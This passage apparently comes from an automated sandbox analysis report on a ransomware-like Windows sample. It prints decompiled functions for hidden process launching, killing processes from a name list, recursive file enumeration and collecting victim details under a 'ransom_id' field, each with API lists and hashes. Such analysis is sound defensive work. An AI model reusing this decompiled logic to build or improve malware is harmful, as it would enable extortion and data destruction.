                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                      • String ID: CheckTokenMembership$advapi32.dll$cJ@
                                      • API String ID: 3309497720-3398485638
                                      • Opcode ID: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
                                      • Instruction ID: 33a1519f93ae69caf91dd4e42da6a452692d52d9b4e3223079b77a4f0d81269a
                                      • Opcode Fuzzy Hash: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
                                      • Instruction Fuzzy Hash: D2F03C30A40209BBEB109BE0DD0EFADBB7CEB04705F1045A5FA04B62D1E6745A108B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00402890(WCHAR* __ecx, intOrPtr __edx) {
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t14;
                                      				void* _t18;
                                      				void* _t23;
                                      				WCHAR* _t29;
                                      				void* _t34;
                                      				signed int _t35;
                                      				long _t37;
                                      				void* _t38;
                                      				void* _t40;
                                      
                                      				_t29 = __ecx;
                                      				_t28 = 0;
                                      				_v12 = __edx;
                                      				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                      				if(_t34 == 0xffffffff) {
                                      					L3:
                                      					return 0;
                                      				} else {
                                      					_v8 = GetFileSize(_t34, 0);
                                      					E00403030(0, _t34, _t35);
                                      					asm("sbb esi, esi");
                                      					_t37 = (_t35 & 0x00000003) + 1;
                                      					_t14 = E00403030(0, _t34, _t37);
                                      					asm("sbb eax, eax");
                                      					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
                                      					_v16 = _t18;
                                      					if(_t18 != 0) {
                                      						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
                                      						if(_t38 != 0) {
                                      							_t23 = E00403030(0, _t34, _t38);
                                      							if(_t23 == 0) {
                                      								_push(_t29);
                                      								_t4 = _t38 + 0x53; // 0x53
                                      								_t29 = _t4;
                                      								_t5 = _t23 + 6; // 0x6
                                      								E00407DB0(_t29, _t5);
                                      								_t40 = _t40 + 4;
                                      							}
                                      							_push(_t29);
                                      							_t28 = E00402830(_v12, _t38, _v8);
                                      							UnmapViewOfFile(_t38);
                                      						}
                                      						CloseHandle(_v16);
                                      						CloseHandle(_t34);
                                      						return _t28;
                                      					} else {
                                      						CloseHandle(_t34);
                                      						goto L3;
                                      					}
                                      				}
                                      			}


















                                      0x00402890
                                      0x00402899
                                      0x0040289b
                                      0x004028b1
                                      0x004028b6
                                      0x004028f9
                                      0x00402901
                                      0x004028b8
                                      0x004028c0
                                      0x004028c3
                                      0x004028ca
                                      0x004028cf
                                      0x004028d0
                                      0x004028d8
                                      0x004028e5
                                      0x004028eb
                                      0x004028f0
                                      0x00402910
                                      0x00402914
                                      0x00402916
                                      0x0040291d
                                      0x0040291f
                                      0x00402920
                                      0x00402920
                                      0x00402923
                                      0x00402926
                                      0x0040292b
                                      0x0040292b
                                      0x0040292e
                                      0x0040293f
                                      0x00402942
                                      0x00402942
                                      0x00402951
                                      0x00402954
                                      0x0040295e
                                      0x004028f2
                                      0x004028f3
                                      0x00000000
                                      0x004028f3
                                      0x004028f0

                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,00402C02), ref: 004028AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00402C02), ref: 004028BA
                                      • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00402C02), ref: 004028E5
                                      • CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 004028F3
                                      • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,00402C02), ref: 0040290A
                                      • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00402C02), ref: 00402942
                                      • CloseHandle.KERNEL32(?,?,?,00402C02), ref: 00402951
                                      • CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 00402954
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                      • String ID:
                                      • API String ID: 265113797-0
                                      • Opcode ID: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
                                      • Instruction ID: c7753fadabc3ce0f8503889d90d66a1a67b62c86d4c9c93fbc6d336bdc04640e
                                      • Opcode Fuzzy Hash: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
                                      • Instruction Fuzzy Hash: 8A2134B2B011197FE7106B749D8AF7F7B6CEB45225F00423AFC01B22C1E6789D0045A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E004033E0(int* __ecx, void* __eflags, char _a4) {
                                      				int* _v8;
                                      				void* _t8;
                                      				char _t10;
                                      				void* _t14;
                                      				void* _t15;
                                      				char _t18;
                                      				char _t19;
                                      				int _t20;
                                      				CHAR* _t23;
                                      				CHAR* _t26;
                                      				CHAR* _t35;
                                      				CHAR* _t40;
                                      
                                      				_push(__ecx);
                                      				_t1 =  &_a4; // 0x405135
                                      				_t26 =  *_t1;
                                      				_t37 = __ecx;
                                      				_v8 = __ecx;
                                      				__ecx[3] = _t26;
                                      				_t8 = E004032B0(__ecx);
                                      				if(_t8 == 0 || _t8 == 0xffffffff) {
                                      					ExitProcess(0);
                                      				}
                                      				if(E00403320(__ecx) == 0) {
                                      					 *__ecx = 0;
                                      					_t10 =  *_t26;
                                      					if(_t10 == 0) {
                                      						goto L4;
                                      					} else {
                                      						do {
                                      							if(_t10 == 0x7b) {
                                      								_t26 =  &(_t26[1]);
                                      								_t14 = E00403190(_t26);
                                      								if(_t14 != 0) {
                                      									_t15 = _t14 - 1;
                                      									if(_t15 == 0) {
                                      										E00403200(_t37, _t26, 1);
                                      									} else {
                                      										if(_t15 == 1) {
                                      											_t18 =  *_t26;
                                      											_t35 = _t26;
                                      											if(_t18 == 0) {
                                      												L15:
                                      												_t19 =  *_t35;
                                      												if(_t19 != 0x7d) {
                                      													_t40 = _t35;
                                      													if(_t19 != 0) {
                                      														while( *_t40 != 0x7d) {
                                      															_t40 =  &(_t40[1]);
                                      															if( *_t40 != 0) {
                                      																continue;
                                      															} else {
                                      															}
                                      															goto L21;
                                      														}
                                      														 *_t40 = 0;
                                      													}
                                      													L21:
                                      													_t20 = lstrlenA(_t35);
                                      													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                      													 *(_v8 + 8) = _t23;
                                      													if(_t23 != 0) {
                                      														lstrcpyA(_t23, _t35);
                                      													}
                                      													 *_t40 = 0x7d;
                                      													_t37 = _v8;
                                      												}
                                      											} else {
                                      												while(_t18 != 0x7d) {
                                      													_t35 =  &(_t35[1]);
                                      													if(_t18 == 0x3d) {
                                      														goto L15;
                                      													} else {
                                      														_t18 =  *_t35;
                                      														if(_t18 != 0) {
                                      															continue;
                                      														} else {
                                      															goto L15;
                                      														}
                                      													}
                                      													goto L25;
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      							L25:
                                      							_t10 = _t26[1];
                                      							_t26 =  &(_t26[1]);
                                      						} while (_t10 != 0);
                                      						return 1;
                                      					}
                                      				} else {
                                      					 *__ecx = 1;
                                      					L4:
                                      					return 1;
                                      				}
                                      			}















                                      0x004033e3
                                      0x004033e5
                                      0x004033e5
                                      0x004033e9
                                      0x004033eb
                                      0x004033ee
                                      0x004033f1
                                      0x004033f8
                                      0x004034db
                                      0x004034db
                                      0x00403410
                                      0x00403425
                                      0x0040342b
                                      0x0040342f
                                      0x00000000
                                      0x00403431
                                      0x00403432
                                      0x00403434
                                      0x0040343a
                                      0x00403441
                                      0x00403444
                                      0x0040344a
                                      0x0040344b
                                      0x004034ba
                                      0x0040344d
                                      0x0040344e
                                      0x00403450
                                      0x00403452
                                      0x00403456
                                      0x00403467
                                      0x00403467
                                      0x0040346b
                                      0x0040346d
                                      0x00403471
                                      0x00403473
                                      0x00403478
                                      0x0040347c
                                      0x00000000
                                      0x00000000
                                      0x0040347e
                                      0x00000000
                                      0x0040347c
                                      0x00403480
                                      0x00403480
                                      0x00403483
                                      0x00403484
                                      0x00403495
                                      0x0040349e
                                      0x004034a3
                                      0x004034a7
                                      0x004034a7
                                      0x004034ad
                                      0x004034b0
                                      0x004034b0
                                      0x00000000
                                      0x00403458
                                      0x0040345c
                                      0x0040345f
                                      0x00000000
                                      0x00403461
                                      0x00403461
                                      0x00403465
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403465
                                      0x00000000
                                      0x0040345f
                                      0x00403458
                                      0x00403456
                                      0x0040344e
                                      0x0040344b
                                      0x00403444
                                      0x004034bf
                                      0x004034bf
                                      0x004034c2
                                      0x004034c3
                                      0x004034d6
                                      0x004034d6
                                      0x00403412
                                      0x00403412
                                      0x00403418
                                      0x00403422
                                      0x00403422

                                      APIs
                                        • Part of subcall function 004032B0: lstrlenA.KERNEL32(?,00000000,?,5Q@,?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032C5
                                        • Part of subcall function 004032B0: lstrlenA.KERNEL32(?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032EE
                                      • lstrlenA.KERNEL32(5Q@,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403484
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,00405135,00000000), ref: 0040348E
                                      • HeapAlloc.KERNEL32(00000000,?,00405135,00000000), ref: 00403495
                                      • lstrcpyA.KERNEL32(00000000,5Q@,?,00405135,00000000), ref: 004034A7
                                      • ExitProcess.KERNEL32 ref: 004034DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                      • String ID: 5Q@
                                      • API String ID: 1867342102-144561132
                                      • Opcode ID: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
                                      • Instruction ID: a602f992c252cea2a24e073b1cce2c09e2fd92cb4485f691b182cac4319fe13f
                                      • Opcode Fuzzy Hash: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
                                      • Instruction Fuzzy Hash: BA31E3305042455AEB265F289C447B77FAC9B06312F1841BBE8C5BF3C2D67D4E4787A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00402C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				struct tagPAINTSTRUCT _v68;
                                      				struct tagPAINTSTRUCT _v88;
                                      				short _v100;
                                      				intOrPtr _t13;
                                      				void* _t15;
                                      				struct HDC__* _t21;
                                      				int _t30;
                                      
                                      				_t13 =  *0x40e290; // 0x21
                                      				asm("movdqu xmm0, [0x40e280]");
                                      				_t30 = _a8;
                                      				_v88.fErase = _t13;
                                      				asm("movdqu [esp+0x10], xmm0");
                                      				_t15 = _t30 - 2;
                                      				if(_t15 == 0) {
                                      					CreateThread(0, 0, E00402AD0, 0, 0, 0);
                                      					DestroyWindow(_a4);
                                      					return 0xdeadbeef;
                                      				} else {
                                      					if(_t15 == 0xd) {
                                      						_t21 = BeginPaint(_a4,  &_v68);
                                      						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                      						EndPaint(_a4,  &_v88);
                                      						return 0;
                                      					} else {
                                      						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                      					}
                                      				}
                                      			}










                                      0x00402c59
                                      0x00402c5e
                                      0x00402c66
                                      0x00402c69
                                      0x00402c70
                                      0x00402c76
                                      0x00402c79
                                      0x00402ce9
                                      0x00402cf2
                                      0x00402d01
                                      0x00402c7b
                                      0x00402c7e
                                      0x00402c9f
                                      0x00402cbd
                                      0x00402ccb
                                      0x00402cd7
                                      0x00402c80
                                      0x00402c94
                                      0x00402c94
                                      0x00402c7e

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00402C8A
                                      • BeginPaint.USER32(?,?), ref: 00402C9F
                                      • lstrlenW.KERNEL32(?), ref: 00402CAC
                                      • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00402CBD
                                      • EndPaint.USER32(?,?), ref: 00402CCB
                                      • CreateThread.KERNEL32 ref: 00402CE9
                                      • DestroyWindow.USER32(?), ref: 00402CF2
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                      • String ID:
                                      • API String ID: 572880375-0
                                      • Opcode ID: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
                                      • Instruction ID: 316be470bdb16b495eaa6a8a4de42634492684a59cc3721c0e018fd81b09cf01
                                      • Opcode Fuzzy Hash: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
                                      • Instruction Fuzzy Hash: D5116332604209ABE711DF54EE0DFAA7B6CFB48311F000626FD45E91E1E7B19D24DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00404B10(WCHAR* __ecx) {
                                      				struct _PROCESS_INFORMATION _v20;
                                      				struct _STARTUPINFOW _v92;
                                      				intOrPtr _t15;
                                      				intOrPtr _t16;
                                      				WCHAR* _t25;
                                      
                                      				asm("xorps xmm0, xmm0");
                                      				_t25 = __ecx;
                                      				asm("movdqu [ebp-0x10], xmm0");
                                      				E00408B30( &_v92, 0, 0x44);
                                      				_t15 =  *0x412b0c; // 0x55c
                                      				_v92.hStdError = _t15;
                                      				_v92.hStdOutput = _t15;
                                      				_t16 =  *0x412b08; // 0x558
                                      				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                      				_v92.hStdInput = _t16;
                                      				_v92.wShowWindow = 0;
                                      				_v92.cb = 0x44;
                                      				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                      					CloseHandle(_v20);
                                      					return CloseHandle(_v20.hThread);
                                      				} else {
                                      					return GetLastError();
                                      				}
                                      			}








                                      0x00404b1c
                                      0x00404b22
                                      0x00404b24
                                      0x00404b29
                                      0x00404b2e
                                      0x00404b36
                                      0x00404b39
                                      0x00404b3c
                                      0x00404b41
                                      0x00404b48
                                      0x00404b4d
                                      0x00404b58
                                      0x00404b77
                                      0x00404b8d
                                      0x00404b98
                                      0x00404b79
                                      0x00404b83
                                      0x00404b83

                                      APIs
                                      • _memset.LIBCMT ref: 00404B29
                                      • CreateProcessW.KERNEL32 ref: 00404B6F
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00404B79
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B8D
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastProcess_memset
                                      • String ID: D
                                      • API String ID: 1393943095-2746444292
                                      • Opcode ID: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
                                      • Instruction ID: c9167ab5344422c8a44933cba82276f3a3bd4aa998c81f02b44ccbb638d81527
                                      • Opcode Fuzzy Hash: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
                                      • Instruction Fuzzy Hash: E3014471E40319ABDB10DFA4DC46BDE7BB8EF04714F104226FA08FA190E7B569548B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004047F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                      				int _t8;
                                      				int _t9;
                                      				void* _t15;
                                      				WCHAR* _t17;
                                      				void* _t18;
                                      				signed int _t23;
                                      				void* _t24;
                                      				void* _t28;
                                      
                                      				_t17 = __ecx;
                                      				_t15 = __ebx;
                                      				while(1) {
                                      					L2:
                                      					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                      					if(_t8 == 0) {
                                      						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                      						if(_t18 != 0) {
                                      							TerminateProcess(_t18, 0);
                                      							CloseHandle(_t18);
                                      						}
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_t5 = _t15 + 0x24; // 0x24
                                      					_t17 = _t5;
                                      					if(_t23 < 0x27) {
                                      						continue;
                                      					}
                                      					L7:
                                      					_t24 = _a12;
                                      					_t9 = Process32NextW(_t24, _t15);
                                      					_t7 = _t15 + 0x24; // 0x24
                                      					_t17 = _t7;
                                      					if(_t9 != 0) {
                                      						_t23 = 0;
                                      						do {
                                      							goto L2;
                                      						} while (_t23 < 0x27);
                                      						goto L7;
                                      					}
                                      					if(_t15 != 0) {
                                      						VirtualFree(_t15, 0, 0x8000);
                                      					}
                                      					return CloseHandle(_t24);
                                      					L2:
                                      					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                      					if(_t8 == 0) {
                                      						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                      						if(_t18 != 0) {
                                      							TerminateProcess(_t18, 0);
                                      							CloseHandle(_t18);
                                      						}
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_t5 = _t15 + 0x24; // 0x24
                                      					_t17 = _t5;
                                      				}
                                      			}











                                      0x004047f8
                                      0x004047f8
                                      0x00404800
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x00404842
                                      0x00000000
                                      0x00000000
                                      0x00404844
                                      0x00404844
                                      0x0040484a
                                      0x00404850
                                      0x00404850
                                      0x00404855
                                      0x004047f4
                                      0x00404800
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404800
                                      0x00404859
                                      0x00404863
                                      0x00404863
                                      0x00404872
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x0040483f

                                      APIs
                                      • lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
                                      • CloseHandle.KERNEL32(00000000), ref: 00404831
                                      • Process32NextW.KERNEL32(?,00000000), ref: 0040484A
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
                                      • CloseHandle.KERNEL32(?), ref: 0040486A
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
                                      • String ID:
                                      • API String ID: 999196985-0
                                      • Opcode ID: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
                                      • Instruction ID: 1a13c8a93cbec1d8c6bc579d8d4bacd9a5b995379d62742e90ee94b5f9f4cf80
                                      • Opcode Fuzzy Hash: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
                                      • Instruction Fuzzy Hash: 7E01D6B7200111ABEB102F10AD48B6B7368EBD5301F104435FF49B61A1EB759C05CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004039B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
                                      				intOrPtr* _t44;
                                      
                                      				_t44 = __ecx;
                                      				 *__ecx = _a4;
                                      				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
                                      				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
                                      				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
                                      				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
                                      				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
                                      				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
                                      				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
                                      				 *(__ecx + 4) = L"pc_user";
                                      				 *(__ecx + 0x10) = L"pc_name";
                                      				 *((intOrPtr*)(__ecx + 0x18)) = 1;
                                      				 *(__ecx + 0x1c) = L"pc_group";
                                      				 *(__ecx + 0x28) = L"av";
                                      				 *(__ecx + 0x34) = L"pc_lang";
                                      				 *(__ecx + 0x40) = L"pc_keyb";
                                      				 *(__ecx + 0x4c) = L"os_major";
                                      				 *(__ecx + 0x58) = L"os_bit";
                                      				 *((intOrPtr*)(__ecx + 0x60)) = 1;
                                      				 *(__ecx + 0x64) = L"ransom_id";
                                      				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
                                      				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
                                      				 *(__ecx + 0x88) = L"ip";
                                      				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
                                      				return _t44;
                                      			}




                                      0x004039b7
                                      0x004039b9
                                      0x004039be
                                      0x004039c4
                                      0x004039ca
                                      0x004039d0
                                      0x004039d6
                                      0x004039dc
                                      0x004039e2
                                      0x004039e8
                                      0x004039ef
                                      0x004039f6
                                      0x004039fd
                                      0x00403a04
                                      0x00403a0b
                                      0x00403a12
                                      0x00403a19
                                      0x00403a20
                                      0x00403a27
                                      0x00403a2e
                                      0x00403a35
                                      0x00403a3c
                                      0x00403a42
                                      0x00403a52
                                      0x00403a5c

                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID: 0@$@@$T@$d@$t@$|@
                                      • API String ID: 54951025-2847450446
                                      • Opcode ID: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
                                      • Instruction ID: 81848ed92efb6c47f2188ed1792c8f7cddf9ec8f0008dcc1071cc611d3409556
                                      • Opcode Fuzzy Hash: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
                                      • Instruction Fuzzy Hash: D5114EB4501B448FC7A0CF6AC58468ABFF0BB08718B409D2EE99A97B50D3B5B458CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00406769() {
                                      				intOrPtr* _t34;
                                      				intOrPtr* _t38;
                                      				void* _t40;
                                      				WCHAR* _t46;
                                      				void* _t51;
                                      
                                      				do {
                                      					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                      						lstrcatW(_t46, _t51 - 0x238);
                                      						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                      							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                      							 *_t38 =  *_t38 + E004063B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
                                      							asm("adc [ebx+0x4], edx");
                                      							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                      							if(__eflags <= 0) {
                                      								if(__eflags < 0) {
                                      									L8:
                                      									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                      									 *_t34 =  *_t34 + 1;
                                      									__eflags =  *_t34;
                                      								} else {
                                      									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                      									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							E004066F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                      						}
                                      						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                      					}
                                      				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                      				FindClose( *(_t51 - 8));
                                      				return 0;
                                      			}








                                      0x00406770
                                      0x00406784
                                      0x004067a8
                                      0x004067b1
                                      0x004067e2
                                      0x004067ed
